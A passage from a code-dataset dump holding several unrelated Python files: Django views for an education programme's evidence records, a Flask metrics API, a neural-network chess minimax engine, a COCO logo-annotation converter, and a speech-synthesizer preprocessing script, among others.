evidencias_r2_tecnotic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_tecnotic_r2'] = evidencias_r2_tecnotic.count()\n\n kwargs['formadores_directic_r2'] = evidencias_r2_directic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_directic_r2'] = evidencias_r2_directic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_directic_r2'] = evidencias_r2_directic.count()\n\n kwargs['formadores_escuelatic_r2'] = evidencias_r2_escuelatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_escuelatic_r2'] = evidencias_r2_escuelatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_escuelatic_r2'] = evidencias_r2_escuelatic.count()\n\n kwargs['ple_r1'] = ple_r1.count()\n kwargs['ple_r2'] = ple_r2.count()\n\n return super(NuevoRedView,self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n\n red = Red.objects.get(id = self.object.id)\n\n if not red.producto_final:\n evidencias = Evidencia.objects.filter(red_id = None)\n\n region_1 = Region.objects.get(numero = 1)\n region_2 = Region.objects.get(numero = 2)\n\n evidencias_r1 = evidencias.filter(formador__region = region_1)\n evidencias_r2 = evidencias.filter(formador__region = region_2)\n\n evidencias_r1_innovatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r1_tecnotic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r1_directic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r1_escuelatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n evidencias_r2_innovatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r2_tecnotic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r2_directic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r2_escuelatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n\n\n if self.object.region.numero == 1:\n if self.object.diplomado.nombre == 'INNOVATIC':\n evidencias_r1_innovatic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'TECNOTIC':\n evidencias_r1_tecnotic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'DIRECTIC':\n evidencias_r1_directic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'ESCUELA TIC FAMILIA':\n evidencias_r1_escuelatic.update(red_id = red.id)\n else:\n pass\n\n elif self.object.region.numero == 2:\n if self.object.diplomado.nombre == 'INNOVATIC':\n evidencias_r2_innovatic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'TECNOTIC':\n evidencias_r2_tecnotic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'DIRECTIC':\n evidencias_r2_directic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'ESCUELA TIC FAMILIA':\n evidencias_r2_escuelatic.update(red_id = red.id)\n else:\n pass\n\n\n else:\n pass\n red.save()\n build_red.delay(red.id)\n else:\n ple_r1 = Beneficiario.objects.filter(region__id=1, estado_producto_final='cargado')\n ple_r2 = Beneficiario.objects.filter(region__id=2, estado_producto_final='cargado')\n\n if self.object.region.numero == 1:\n if self.object.diplomado.nombre == 'INNOVATIC':\n for beneficiario in ple_r1:\n 
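                    # Reviewer note (added comment, not in the original file):
                    # this per-object add()/save() loop issues a query pair per
                    # beneficiario; red.beneficiarios.add(*ple_r1) combined
                    # with a queryset .update(estado_producto_final='enviado')
                    # would be a hypothetical bulk alternative doing the same
                    # work in two queries.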
red.beneficiarios.add(beneficiario)\n beneficiario.estado_producto_final = 'enviado'\n beneficiario.save()\n else:\n pass\n\n elif self.object.region.numero == 2:\n if self.object.diplomado.nombre == 'INNOVATIC':\n for beneficiario in ple_r2:\n red.beneficiarios.add(beneficiario)\n beneficiario.estado_producto_final = 'enviado'\n beneficiario.save()\n else:\n pass\n\n else:\n pass\n\n red.save()\n build_red_producto_final.delay(red.id)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass UpdateRedView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UpdateView):\n model = Red\n form_class = RedRetroalimentacionForm\n success_url = '../../'\n template_name = 'evidencias/red/editar.html'\n permission_required = \"permisos_sican.evidencias.red.editar\"\n\n\n def form_valid(self, form):\n self.object = form.save()\n retroalimentacion_red.delay(self.object.id)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass CargaMasivaListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/cargamasiva/lista.html'\n permission_required = \"permisos_sican.evidencias.cargamasivaevidencias.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.cargamasivaevidencias.crear')\n return super(CargaMasivaListView,self).get_context_data(**kwargs)\n\n\nclass NuevoCargaMasivaView(LoginRequiredMixin,\n PermissionRequiredMixin,\n CreateView):\n model = CargaMasiva\n form_class = CargaMasivaForm\n success_url = '../'\n template_name = 'evidencias/cargamasiva/nuevo.html'\n permission_required = \"permisos_sican.evidencias.cargamasivaevidencias.crear\"\n\n def get_initial(self):\n return {'id_usuario':self.request.user.id}\n\n def form_valid(self, form):\n self.object = form.save()\n carga_masiva_evidencias.delay(self.object.id,self.request.user.id)\n return super(NuevoCargaMasivaView,self).form_valid(form)\n\n\nclass AuxiliaresListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/rendimiento/lista.html'\n permission_required = \"permisos_sican.auxiliares.rendimiento.ver\"\n\n\nclass BeneficiarioEvidenciaCedulaList(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/cedula/lista_beneficiarios.html'\n permission_required = \"permisos_sican.evidencias.cedula_beneficiario.ver\"\n\n\nclass BeneficiarioEvidenciaCedulaProductoList(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/cedula/lista_productos.html'\n permission_required = \"permisos_sican.evidencias.cedula_beneficiario.ver\"\n\n\n def get_context_data(self, **kwargs):\n kwargs['id_beneficiario'] = self.kwargs['id_beneficiario']\n kwargs['nombre_beneficiario'] = Beneficiario.objects.get(id = self.kwargs['id_beneficiario']).get_full_name()\n return super(BeneficiarioEvidenciaCedulaProductoList,self).get_context_data(**kwargs)\n\nclass SubsanacionListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/subsanacion/lista_reds.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.ver\"\n\n\nclass SubsanacionEvidenciasListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/subsanacion/lista_evidencias.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_red'] = self.kwargs['id_red']\n return 
super(SubsanacionEvidenciasListView,self).get_context_data(**kwargs)\n\n\n\nclass PleListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/ple/lista.html'\n permission_required = \"permisos_sican.evidencias.subsanacion_ple.ver\"\n\n\n\n\n\n\nclass PleBeneficiarioView(LoginRequiredMixin,\n PermissionRequiredMixin,\n FormView):\n form_class = PleBeneficiarioForm\n success_url = '../../'\n template_name = 'evidencias/ple/editar.html'\n permission_required = \"permisos_sican.evidencias.subsanacion_ple.editar\"\n\n\n def get_context_data(self, **kwargs):\n kwargs['cedula'] = Beneficiario.objects.get(id=self.kwargs['id_beneficiario']).cedula\n return super(PleBeneficiarioView,self).get_context_data(**kwargs)\n\n def get_initial(self):\n return {'beneficiario':Beneficiario.objects.get(id=self.kwargs['id_beneficiario'])}\n\n\n def form_valid(self, form):\n beneficiario = Beneficiario.objects.get(id=self.kwargs['id_beneficiario'])\n\n\n beneficiario.nombre_producto_final = form.cleaned_data['nombre']\n beneficiario.area_basica_producto_final = form.cleaned_data['area']\n beneficiario.estado_producto_final = 'cargado'\n beneficiario.para_leer = form.cleaned_data['para_leer']\n beneficiario.para_hacer_1 = form.cleaned_data['para_hacer_1']\n beneficiario.para_hacer_2 = form.cleaned_data['para_hacer_2']\n beneficiario.para_hacer_3 = form.cleaned_data['para_hacer_3']\n beneficiario.para_hacer_4 = form.cleaned_data['para_hacer_4']\n beneficiario.imagen_historieta = form.cleaned_data['imagen_historieta']\n beneficiario.imagen_infografia = form.cleaned_data['imagen_infografia']\n beneficiario.imagen_graficacion_ple = form.cleaned_data['imagen_graficacion_ple']\n beneficiario.link_ruta_sostenibilidad = form.cleaned_data['link_ruta_sostenibilidad']\n beneficiario.imagen_para_leer = form.cleaned_data['imagen_para_leer']\n beneficiario.html = File(open(settings.STATICFILES_DIRS[0] + '\\\\documentos\\\\ple.html'))\n beneficiario.save()\n\n file = codecs.open(beneficiario.html.path, 'r+', 'utf-8')\n text_index_1 = file.read()\n file = codecs.open(beneficiario.html.path, 'w', 'utf-8')\n\n para_hacer_adicionales = []\n\n if beneficiario.para_hacer_2 != \"\":\n para_hacer_adicionales.append(beneficiario.para_hacer_2)\n\n if beneficiario.para_hacer_3 != \"\":\n para_hacer_adicionales.append(beneficiario.para_hacer_3)\n\n if beneficiario.para_hacer_4 != \"\":\n para_hacer_adicionales.append(beneficiario.para_hacer_4)\n\n\n adicional = ''\n\n for x in para_hacer_adicionales:\n adicional += '
        '\n\n\n navar_color_list = ['#194F83','#4C4A9C',\"#831A1C\",\"#008346\"]\n section_color_list = ['#3DCF8C',\"#3DC8CF\",\"#9C9671\",\"#9C3DCF\"]\n\n navar_color = random.choice(navar_color_list)\n section_color = random.choice(section_color_list)\n\n imagen_para_leer = ''\n if beneficiario.imagen_para_leer != None:\n imagen_para_leer = ''\n\n file.write(text_index_1.replace('{{IMAGEN_PARA_LEER}}',imagen_para_leer).replace('{{NAVAR_COLOR}}',navar_color).replace('{{SECTION_COLOR}}',section_color).replace('{{TITULO}}', beneficiario.nombre_producto_final).replace('{{NOMBRE_DOCENTE}}',beneficiario.nombres+\" \"+beneficiario.apellidos + \" - \"+str(beneficiario.cedula)).replace('{{TEXTO_PARA_LEER}}',beneficiario.para_leer).replace('{{URL_PARA_HACER}}',beneficiario.para_hacer_1).replace('{{URL_PARA_HACER_ADICIONAL}}',adicional).replace('{{URL_HISTORIETA}}',beneficiario.imagen_historieta.url).replace('{{URL_INFOGRAFIA}}',beneficiario.imagen_infografia.url).replace('{{URL_GRAFICACION_PLE}}',beneficiario.imagen_graficacion_ple.url).replace('{{URL_RUTA_SOSTENIBILIDAD}}',beneficiario.link_ruta_sostenibilidad.replace('scene','card')))\n\n file.close()\n\n beneficiario.link = beneficiario.html.url\n\n beneficiario.save()\n\n\n return HttpResponseRedirect(self.get_success_url())\n\n\n\n\n\nclass SubsanacionEvidenciasFormView(LoginRequiredMixin,\n PermissionRequiredMixin,\n FormView):\n\n form_class = SubsanacionEvidenciaForm\n success_url = '../'\n template_name = 'evidencias/subsanacion/evidencia.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.crear\"\n\n def get_context_data(self, **kwargs):\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n kwargs['id_red'] = self.kwargs['id_red']\n kwargs['id_evidencia'] = self.kwargs['id_evidencia']\n kwargs['link_soporte'] = evidencia.get_archivo_url()\n kwargs['nombre_soporte'] = os.path.basename(evidencia.archivo.name)\n\n return super(SubsanacionEvidenciasFormView,self).get_context_data(**kwargs)\n\n def get_initial(self):\n return {'id_red':self.kwargs['id_red'],'id_evidencia':self.kwargs['id_evidencia']}\n\n def form_valid(self, form):\n keys = list(form.cleaned_data.keys())\n keys.remove('archivo')\n keys.remove('observacion')\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n\n if form.cleaned_data['archivo'] != None:\n archivo = form.cleaned_data['archivo']\n else:\n archivo = evidencia.archivo\n\n nueva_evidencia = Evidencia.objects.create(usuario = self.request.user,archivo = archivo,entregable=evidencia.entregable,\n formador=evidencia.formador,subsanacion=True)\n\n cantidad = 0\n\n for key in keys:\n if form.cleaned_data[key]:\n cantidad += 1\n beneficiario = Beneficiario.objects.get(id = key.split('_')[1])\n nueva_evidencia.beneficiarios_cargados.add(beneficiario)\n rechazo = Rechazo.objects.filter(evidencia_id__exact = self.kwargs['id_evidencia'],beneficiario_rechazo = beneficiario)\n\n try:\n evidencia.beneficiarios_cargados.remove(beneficiario)\n except:\n pass\n try:\n evidencia.beneficiarios_rechazados.remove(rechazo[0])\n except:\n pass\n\n nueva_evidencia.cantidad_cargados = cantidad\n nueva_evidencia.save()\n\n Subsanacion.objects.create(evidencia_origen = evidencia,evidencia_subsanada=nueva_evidencia,usuario=self.request.user,\n red = Red.objects.get(id = self.kwargs['id_red']),observacion = form.cleaned_data['observacion'])\n\n\n return super(SubsanacionEvidenciasFormView,self).form_valid(form)\n\n\n\n\nclass 
SubsanacionEvidenciasBeneficiarioView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UpdateView):\n\n model = Beneficiario\n form_class = BeneficiarioUpdateForm\n success_url = '../../'\n template_name = 'evidencias/subsanacion/actualizar_participante.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.crear\"\n pk_url_kwarg = 'id_beneficiario'\n\n def get_context_data(self, **kwargs):\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n kwargs['id_red'] = self.kwargs['id_red']\n kwargs['id_evidencia'] = self.kwargs['id_evidencia']\n kwargs['link_soporte'] = evidencia.get_archivo_url()\n kwargs['nombre_soporte'] = os.path.basename(evidencia.archivo.name)\n\n return super(SubsanacionEvidenciasBeneficiarioView,self).get_context_data(**kwargs)\n\n\n def get_initial(self):\n return {'id_red':self.kwargs['id_red'],'id_evidencia':self.kwargs['id_evidencia'],'diplomado_nombre':self.object.diplomado.nombre.upper(),'formador_id':self.object.formador.id,'beneficiario_id':self.object.id}\n\n\n def form_valid(self, form):\n self.object = form.save()\n if self.object.diplomado.nombre != 'ESCUELA TIC FAMILIA':\n self.object.radicado = Radicado.objects.get(numero=form.cleaned_data['radicado_text'])\n self.object.save()\n return super(SubsanacionEvidenciasBeneficiarioView, self).form_valid(form)\n\n\n\n\nclass ListaSubsanacionEvidenciaView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/subsanacion/lista_subsanaciones.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.ver\"\n\n def get_context_data(self, **kwargs):\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n kwargs['id_red'] = self.kwargs['id_red']\n kwargs['id_evidencia'] = self.kwargs['id_evidencia']\n kwargs['link_soporte'] = evidencia.get_archivo_url()\n kwargs['nombre_soporte'] = os.path.basename(evidencia.archivo.name)\n\n return super(ListaSubsanacionEvidenciaView,self).get_context_data(**kwargs)","sub_path":"evidencias/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"506701724","text":"from collections import Counter\nfrom flask_restful import Resource\nfrom flask import request\nfrom src.models.api_response import APIResponse, post_error\nfrom src.models.api_enums import APIStatus\nfrom src.repositories import SummarizeDatasetRepo\nimport logging\n\nlog = logging.getLogger('file')\nsummarizeDatasetRepo = SummarizeDatasetRepo()\n\n\nclass DatasetSearchResource(Resource):\n def get(self):\n search_result = summarizeDatasetRepo.search()\n res = APIResponse(APIStatus.SUCCESS.value, search_result)\n return res.getresjson(), 200\n\nclass DatasetAggregateResource(Resource):\n def post(self):\n body = request.get_json()\n log.info(\"Metric request received for datasets\")\n try:\n search_result, count = summarizeDatasetRepo.aggregate(body)\n except Exception as e:\n log.exception(\"Exception at DatasetAggregateResource:{}\".format(str(e)))\n return post_error(\"Data Missing\",\"Mandatory key checks failed\",None), 400\n res = APIResponse(APIStatus.SUCCESS.value, search_result,count)\n return res.getresjson(), 200\n\nclass ModelAggregateResource(Resource):\n def post(self):\n body = request.get_json()\n log.info(\"Metric request received for models\")\n try:\n search_result,count = summarizeDatasetRepo.aggregate_models(body)\n except Exception as e:\n log.exception(\"Exception at 
ModelAggregateResource:{}\".format(str(e)))\n return post_error(\"Data Missing\",\"Mandatory key checks failed\",None), 400\n res = APIResponse(APIStatus.SUCCESS.value, search_result,count)\n return res.getresjson(), 200\n","sub_path":"backend/metric/ulca-metric-api/src/resources/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649253830","text":"import chess\nimport numpy as np\nimport sys\nimport os\nimport torch\n\nfrom net import Net\nfrom board_parser import parse_board\n\nmodel_path = \"/Users/david/Dropbox/chessNet/models/\" + \"valuator_3.1.15.pth\"\n\nclass Game(object):\n def __init__(self, depth, init=1, model=None):\n self.board = chess.Board()\n self.model = self.load_agent_model(model_path) if model is None else model\n self.history = []\n\n # 1 = agent plays blacks / 0 = agent plays whites\n self.init = init\n self.depth = depth\n if init == 0:\n self.agent_move()\n\n def load_agent_model(self, path):\n weights = torch.load(path, map_location=lambda storage, loc: storage)\n model = Net()\n model.load_state_dict(weights)\n model.eval()\n return model\n\n def move(self, string_move):\n \"\"\" Return (True, agent_move) if the move is legal, (False, None) otherwise \"\"\"\n user_move = chess.Move.from_uci(string_move)\n if user_move in self.board.legal_moves:\n print(\"User moves:\", string_move)\n self.board.push(user_move)\n agent_move = self.agent_move()\n self.history.append([string_move, str(agent_move)])\n return True, agent_move\n else:\n return False, None\n \n def evaluate(self, state):\n pstate = parse_board(state)\n pstate = np.expand_dims(pstate, axis=0)\n pstate = torch.from_numpy(pstate).float()\n\n val = self.model(pstate)[0]\n return val.item()\n\n def minimax(self, node, depth, maximizingPlayer):\n if depth == 0:\n return self.evaluate(node)\n \n if maximizingPlayer:\n value = float(\"-inf\")\n for legal in node.legal_moves:\n node.push(legal)\n value = max(value, self.minimax(node, depth-1, False))\n node.pop()\n return value\n\n else:\n value = float('inf')\n for legal in node.legal_moves:\n node.push(legal)\n value = min(value, self.minimax(node, depth-1, True))\n node.pop()\n return value\n\n def minimax_refactor(self, node, depth, maximizingPlayer):\n \"\"\"Like minimax, but also returns the per-move scores and the moves themselves.\"\"\"\n if depth == 0:\n return self.evaluate(node)\n \n scores = []\n moves = []\n if maximizingPlayer:\n value = float(\"-inf\")\n for legal in node.legal_moves:\n node.push(legal)\n value = max(value, self.minimax(node, depth-1, False))\n\n scores.append(value)\n moves.append(legal)\n \n node.pop()\n return value, scores, moves\n\n else:\n value = float('inf')\n for legal in node.legal_moves:\n node.push(legal)\n value = min(value, self.minimax(node, depth-1, True))\n\n scores.append(value)\n moves.append(legal)\n\n node.pop()\n return value, scores, moves\n \n def agent_move(self):\n # minimize when the agent plays black (init == 1), maximize when it plays white (init == 0)\n b_value, scores, moves = self.minimax_refactor(self.board, self.depth, not self.init)\n print(scores)\n\n b_idx = scores.index(b_value)\n best_move = moves[b_idx]\n\n self.board.push(best_move)\n print(\"Machine move:\", best_move, \"Value=\", b_value)\n return best_move\n\n def autoplay(self):\n self.init = 0\n while not self.board.is_game_over():\n a_move = self.agent_move()\n print(\"Computer %s: %s\" %(\"Black\" if self.init == 1 else \"White\", a_move))\n print(self.board)\n self.init = not self.init\n\n return self.board.result()\n\nif __name__ == \"__main__\":\n depth = 2\n game = Game(depth=depth)\n\n args = sys.argv[1:]\n if len(args) > 0:\n if args[0] == \"autoplay\":\n try:\n n_games = int(args[1])\n results = {\"1-0\": 0, \"1/2-1/2\": 0, \"0-1\": 0}\n for n in range(n_games):\n print(f\"Playing game: {n}/{n_games}\")\n print(\"--------------\")\n res = game.autoplay()\n results[res] += 1\n game = Game(depth=depth)\n print(results)\n except (IndexError, ValueError):\n print(\"Number of games needed\")\n elif args[0] == \"play\":\n while not game.board.is_game_over():\n print(game.board)\n user_move = input(\"Move: \")\n if user_move == \"q\":\n break\n # move() returns a (legal, agent_move) tuple; unpack it so the legality check works\n legal, _ = game.move(user_move)\n\n if not legal:\n print(\"Move not legal\")\n else:\n print(\"Options needed: play or autoplay\")\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"629359567","text":"import json\nimport os\n\nimport cv2\n\ndataset = {\n 'licenses': [],\n 'info': [],\n 'categories': [],\n 'images': [],\n 'annotations': []\n}\n\nclasses = ['adidas', 'aldi', 'apple', 'becks', 'bmw',\n 'carlsberg', 'chimay', 'cocacola', 'corona', 'dhl',\n 'erdinger', 'esso', 'fedex', 'ferrari', 'ford',\n 'fosters', 'google', 'guiness', 'heineken', 'HP',\n 'milka', 'nvidia', 'paulaner', 'pepsi', 'rittersport',\n 'shell', 'singha', 'starbucks', 'stellaartois', 'texaco',\n 'tsingtao', 'ups']\n\nfor i, cls in enumerate(classes, 1): # category ids start from 1\n dataset['categories'].append({\n 'id': i,\n 'name': cls,\n 'supercategory': 'logo'\n })\n\ndef get_category_id(cls):\n for category in dataset['categories']:\n if category['name'] == cls:\n return category['id']\n\nj = 1\nwith open('files/test.txt', 'r') as f:\n img_number = 0\n file_name_dict = {}\n lines = [line for line in f.readlines() if line.strip()]\n for i, line in enumerate(lines):\n parts = line.strip().split()\n fn = parts[0]\n cls = parts[1]\n x1 = int(parts[2])\n y1 = int(parts[3])\n width = int(parts[4])\n height = int(parts[5])\n if cls == 'no-logo':\n continue\n img_dir = os.path.join('files/jpg', cls)\n im = cv2.imread(os.path.join(img_dir, fn))\n img_height, img_width, _ = im.shape\n if fn in file_name_dict:\n img_id = file_name_dict[fn]\n else:\n img_number = img_number + 1\n file_name_dict[fn] = img_number\n img_id = file_name_dict[fn]\n dataset['images'].append({\n 'coco_url': '',\n 'date_captured': '',\n 'file_name': fn,\n 'flickr_url': '',\n 'id': img_id,\n 'license': 0,\n 'width': img_width,\n 'height': img_height\n })\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x1, y1, width, height],\n 'category_id': get_category_id(cls),\n 'id': j,\n 'image_id': img_id,\n 'iscrowd': 0,\n 'segmentation': []\n })\n j += 1\n\nfolder = os.path.join('files/', 'finalanno')\nif not os.path.exists(folder):\n
os.makedirs(folder)\njson_name = os.path.join('files', 'finalanno/val.json')\nwith open(json_name, 'w') as f:\n json.dump(dataset, f)\nprint(len(dataset['images']))\nprint(len(dataset['annotations']))\n","sub_path":"annotation.py","file_name":"annotation.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51937770","text":"\"\"\"\n    Serialization and deserialization of directions in the direction file.\n\"\"\"\n\nimport torch\n\ndef write_list(f, name, direction):\n \"\"\"Write a list of numpy arrays into the hdf5 file\"\"\"\n grp = f.create_group(name)\n for i, l in enumerate(direction):\n if isinstance(l, torch.Tensor):\n l = l.numpy()\n grp.create_dataset(str(i), data=l)\n\n\ndef read_list(f, name):\n \"\"\"Read a list of numpy arrays from the hdf5 file\"\"\"\n grp = f[name]\n return [grp[str(i)] for i in range(len(grp))]\n","sub_path":"h5_util.py","file_name":"h5_util.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305477995","text":"FH=open(\"captains.txt\")\r\ndata=list()\r\nclass cricket:\r\n def __init__(self,list1):\r\n self.name=list1[0]\r\n self.mat=int(list1[2])\r\n self.won=int(list1[3])\r\n self.lost=int(list1[4])\r\nheaders=next(FH)  # skip the header row\r\nfor line in FH:\r\n data.append(cricket(line.split(',')))\r\nFH.close()\r\nfor peep in data:\r\n peep.winperc=round((peep.won/peep.mat)*100, 2)\r\nfor final in sorted(data,key=lambda x:x.winperc,reverse=True):\r\n print(final.name)\r\n","sub_path":"classcric.py","file_name":"classcric.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"526453453","text":"import sys\n\nsys.path.append(\"../\")\nfrom core.synthesizer.preprocess import preprocess_dataset\nfrom core.synthesizer.preprocess import create_embeddings\nfrom core.synthesizer.hparams import hparams\nfrom core.utils.argutils import print_args\nfrom pathlib import Path\nimport argparse\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Preprocesses audio files from datasets, encodes them as mel spectrograms \"\n \"and writes them to the disk. Audio files are also saved, to be used by the \"\n \"vocoder for training.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"datasets_root\",\n type=Path,\n help=\"Path to the directory containing your LibriSpeech/TTS datasets.\",\n )\n parser.add_argument(\n \"-o\",\n \"--out_dir\",\n type=Path,\n default=argparse.SUPPRESS,\n help=\"Path to the output directory that will contain the mel spectrograms, the audios and the \"\n \"embeds. Defaults to /SV2TTS/synthesizer/\",\n )\n parser.add_argument(\n \"-n\",\n \"--n_processes\",\n type=int,\n default=None,\n help=\"Number of processes in parallel.\",\n )\n parser.add_argument(\n \"-s\",\n \"--skip_existing\",\n action=\"store_true\",\n help=\"Whether to overwrite existing files with the same name. Useful if the preprocessing was \"\n \"interrupted.\",\n )\n parser.add_argument(\n \"-e\",\n \"--encoder_model_fpath\",\n type=Path,\n default=\"../../saved_models/en_US/pretrained/encoder/encoder.pt\",\n help=\"Path to your trained encoder model.\",\n )\n parser.add_argument(\n \"--max_embed_processes\",\n type=int,\n default=4,\n help=\"Maximum number of parallel processes for embedding. 
An encoder is created for each, so \"\n \"you may need to lower this value on GPUs with low memory. Set it to 1 if CUDA is unhappy.\",\n )\n parser.add_argument(\n \"--hparams\",\n type=str,\n default=\"\",\n help=\"Hyperparameter overrides as a comma-separated list of name-value pairs\",\n )\n parser.add_argument(\n \"--no_trim\",\n action=\"store_true\",\n help=\"Preprocess audio without trimming silences (not recommended).\",\n )\n parser.add_argument(\n \"--no_alignments\",\n action=\"store_true\",\n help=\"Use this option when dataset does not include alignments\\\n (these are used to split long audio files into sub-utterances.)\",\n )\n parser.add_argument(\n \"--datasets_name\",\n type=str,\n default=\"LibriSpeech\",\n help=\"Name of the dataset directory to process.\",\n )\n parser.add_argument(\n \"--subfolders\",\n type=str,\n default=\"train-clean-100, train-clean-360\",\n help=\"Comma-separated list of subfolders to process inside your dataset directory\",\n )\n parser.add_argument(\n \"--no_mels\", action=\"store_true\", help=\"Use this option to skip mel generation.\"\n )\n parser.add_argument(\n \"--no_embeds\",\n action=\"store_true\",\n help=\"Use this option to skip embed generation.\",\n )\n\n args = parser.parse_args()\n\n # Process the arguments\n if not hasattr(args, \"out_dir\"):\n args.out_dir = args.datasets_root.joinpath(\"SV2TTS\", \"synthesizer\")\n\n # Create directories\n assert args.datasets_root.exists()\n args.out_dir.mkdir(exist_ok=True, parents=True)\n\n # Verify webrtcvad is available\n if not args.no_trim:\n try:\n import webrtcvad\n except ImportError:\n raise ModuleNotFoundError(\n \"Package 'webrtcvad' not found. This package enables \"\n \"noise removal and is recommended. Please install and try again. If installation fails, \"\n \"use --no_trim to disable this error message.\"\n )\n del args.no_trim\n\n # Get preprocess options\n process_mels = False if args.no_mels else True\n process_embeds = False if args.no_embeds else True\n del args.no_mels\n del args.no_embeds\n\n # Build args for embedding\n args_embeds = argparse.Namespace(\n encoder_model_fpath=args.encoder_model_fpath,\n n_processes=args.max_embed_processes,\n synthesizer_root=args.out_dir,\n skip_existing=args.skip_existing,\n )\n\n # Delete args not used for mel preprocessing\n del args.encoder_model_fpath\n del args.max_embed_processes\n\n # Preprocess the dataset\n print_args(args, parser)\n args.hparams = hparams.parse(args.hparams)\n\n # Preprocess mels\n if process_mels:\n print(\"Preprocessing mels...\")\n preprocess_dataset(**vars(args))\n\n # Preprocess embeds\n if process_embeds:\n print(\"Preprocessing embeds...\")\n create_embeddings(**vars(args_embeds))\n","sub_path":"mlrtvc/src/pre_processing/synthesizer_preprocess.py","file_name":"synthesizer_preprocess.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"224350953","text":"from modulos.generador_csv import *\nfrom modulos.modulo_merge import *\nfrom modulos.panel_general_funciones import *\nfrom modulos.informacion_desarrollador import *\nfrom modulos.consulta_funciones import *\nfrom modulos.analizador_reutilizacion_codigo import *\nfrom modulos.arbol_invocacion import *\n\ndef main_main():\n \"\"\"[Author: Tomas Yu Nakasone]\n [Help: Generates fuente_unico.csv and comentarios.csv, then runs the execution path for whichever option you choose.]\n \"\"\"\n archivo = \"programas.txt\"\n lista_funciones, lista_comentarios = main_generador(archivo)\n main_modulo_merge(lista_funciones, lista_comentarios)\n print(\"Done generating fuente_unico.csv and comentarios.csv!!!\n\")\n\n print(\"(1) - General function panel\")\n print(\"(2) - Function lookup\")\n print(\"(3) - Code reuse analyzer\")\n print(\"(4) - Invocation tree\")\n print(\"(5) - Per-developer information\")\n opcion = str(input(\"\nEnter the number of the option you want: \"))\n\n if opcion == \"1\":\n print(\"\n\")\n print(\"---GENERAL FUNCTION PANEL ---------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n comentarios = open(\"comentarios.csv\", \"r\")\n arch_salida = open(\"./salidas_modulos/panel_general.csv\",\"w\")\n main_panel_general_funciones(fuente_unico, 